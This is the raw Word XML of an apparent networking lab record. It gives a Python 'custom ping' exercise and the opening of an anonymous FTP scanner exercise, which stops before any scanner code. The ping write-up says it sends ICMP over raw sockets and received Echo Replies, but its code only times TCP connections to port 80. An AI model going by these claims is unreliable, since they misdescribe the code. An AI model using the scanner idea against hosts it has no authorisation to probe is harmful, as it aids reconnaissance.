    <w:p w14:paraId="272EA409" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="16DDAD1C" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="22C4AFB4" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="6F66B1D1" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="644116C5" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="74C4AFFD" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="0011F188" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="78D567CD" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="3BC3A340" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="3DD00478" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="21E245BB" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="26DFF0DA" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2578C188" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="04B0CE0C" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="7CC0209B" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="55CA08F5" w14:textId="77777777" w:rsidR="00FD2439" w:rsidRDefault="00FD2439" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="71EF96F0" w14:textId="77486F5D" w:rsidR="00B439DD" w:rsidRDefault="00AC184C" w:rsidP="001E634C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DE</w:t>
      </w:r>
      <w:r w:rsidR="001E634C">
        <w:t>VELOP</w:t>
      </w:r>
      <w:r w:rsidR="001E634C" w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E634C">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="001E634C" w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> CUSTOMIZED PING COMMAND TO TEST THE SERVER CONNECTIVITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D0235D" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="65422159" w14:textId="75462F40" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ex.No</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006B10E7">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B9965" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="0D85D30B" w14:textId="5FF37030" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE0EB5" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>A customized ping sends ICMP Echo Request packets to a target and waits for Echo Reply. It measures reachability and round-trip time (RTT). This script implements a basic ping in Python using raw sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0E0B5" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="6A871B0E" w14:textId="1923D475" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25D81A" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>Write a small Python program that sends ICMP Echo Requests to a server, receives replies, and shows RTT and packet info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D367070" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="32E04C7D" w14:textId="6EB0E3ED" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E33897" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:t>Build an ICMP Echo Request packet (type 8, code 0) with a checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FEE93F" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:t>Send the packet to the target via a raw socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22470169" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:t>Wait for an ICMP Echo Reply (type 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DE5B9" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:t>Measure time between send and receive and print result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532B61C" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E634C">
        <w:t>Repeat N times or until interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DC510" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="7F7BE551" w14:textId="4CDA87D9" w:rsidR="00B439DD" w:rsidRDefault="001E634C" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D99DF" w14:textId="77777777" w:rsidR="00645639" w:rsidRDefault="00645639" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="4F1E96FD" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>import socket, time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EB0CE" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>host = "google.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F18191" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>port = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61044A07" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>count = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98CAC7" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>times = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA82523" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="29A57879" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> in range(count):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0B7BBE" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F97144B" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F26D25" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        start = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51ED80" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10FECD" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        end = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0BB3E6" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>s.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05014597" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>rtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> = (end - start) * 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD76CD4" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>times.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>rtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F76B29F" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>f"Reply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> from {host}: time={rtt:.2f} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF3AAD" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">    except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AF289" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">        print("Request timed out")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE75369" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t>if times:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477ECDC" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">    print("\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>nMin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> RTT =", min(times), "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6AEBB" w14:textId="77777777" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">    print("Max RTT =", max(times), "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A0AAF" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>Avg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t xml:space="preserve"> RTT =", sum(times)/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>(times), "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E634C">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCB2AE" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C"/>
    <w:p w14:paraId="225D1591" w14:textId="7ADA8E32" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD590B1" w14:textId="0EB2D744" w:rsidR="001E634C" w:rsidRPr="001E634C" w:rsidRDefault="001E634C" w:rsidP="001E634C">
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF8F762" wp14:editId="1F3D7AA9">
            <wp:extent cx="5731510" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="23549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98831" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2813685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F2B9B" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1B818C6B" w14:textId="77777777" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="17C82DB9" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="0014C9D4" w14:textId="588545A1" w:rsidR="00B439DD" w:rsidRDefault="001E634C" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="001E634C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA637F6" w14:textId="696E7C5F" w:rsidR="001E634C" w:rsidRDefault="001E634C" w:rsidP="00A52A5F">
      <w:r w:rsidRPr="001E634C">
        <w:t>The custom ping program successfully sent ICMP Echo Requests and received Echo Replies from the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755ACA99" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2B0D8395" w14:textId="77777777" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="31A72A8A" w14:textId="480739DE" w:rsidR="00B439DD" w:rsidRDefault="00B439DD" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="321D3186" w14:textId="0CD81511" w:rsidR="00B3217F" w:rsidRDefault="00B3217F" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1E2B2200" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="39F1F437" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="3C095F3E" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="29C03AAF" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="3CC0B21D" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="40EF7265" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="6BCA4D7E" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1CD768DE" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="161813C9" w14:textId="77777777" w:rsidR="00355342" w:rsidRDefault="00355342" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="0D4BFD84" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="190B5A31" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1DA7AF98" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="64A86D4E" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="4BA061FA" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="1AAE4B64" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="25B9C305" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2F5F4B1A" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="68DB6030" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="2AF05799" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00A52A5F"/>
    <w:p w14:paraId="23B08D51" w14:textId="7539DA82" w:rsidR="00355342" w:rsidRDefault="00DE7485" w:rsidP="00DE7485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>BUILDING AN ANONYMOUS FTP SCANNER USING FTPLIB MODULE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408530E0" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRPr="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00DE7485"/>
    <w:p w14:paraId="0089BE65" w14:textId="208F8EE2" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00DE7485">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ex.No</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006B10E7">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E55507" w14:textId="77777777" w:rsidR="00DE7485" w:rsidRDefault="00DE7485" w:rsidP="00DE7485"/>
    <w:p w14:paraId="0566FBE2" w14:textId="7545C594" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intro</w:t>
      </w:r>
      <w:r w:rsidR="00645639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9CB84" w14:textId="77777777" w:rsidR="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:r w:rsidRPr="006C6910">
        <w:t>Anonymous FTP servers allow logging in with the username anonymous (often using an email as password). A basic anonymous FTP scanner tries to connect to FTP servers (port 21) and attempts an anonymous login to check whether anonymous access is allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540F7CD" w14:textId="77777777" w:rsidR="00645639" w:rsidRPr="006C6910" w:rsidRDefault="00645639" w:rsidP="006C6910"/>
    <w:p w14:paraId="70616C8E" w14:textId="10B9AF16" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r w:rsidR="00645639">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E691D" w14:textId="77777777" w:rsidR="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:r w:rsidRPr="006C6910">
        <w:t>Create a small Python script that checks one or more hosts for FTP service and reports whether anonymous login is permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088DFB6" w14:textId="77777777" w:rsidR="00645639" w:rsidRPr="006C6910" w:rsidRDefault="00645639" w:rsidP="006C6910"/>
    <w:p w14:paraId="46635C2B" w14:textId="3E719F25" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="00645639" w:rsidP="006C6910">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6910">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3C744" w14:textId="77777777" w:rsidR="006C6910" w:rsidRPr="006C6910" w:rsidRDefault="006C6910" w:rsidP="006C6910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
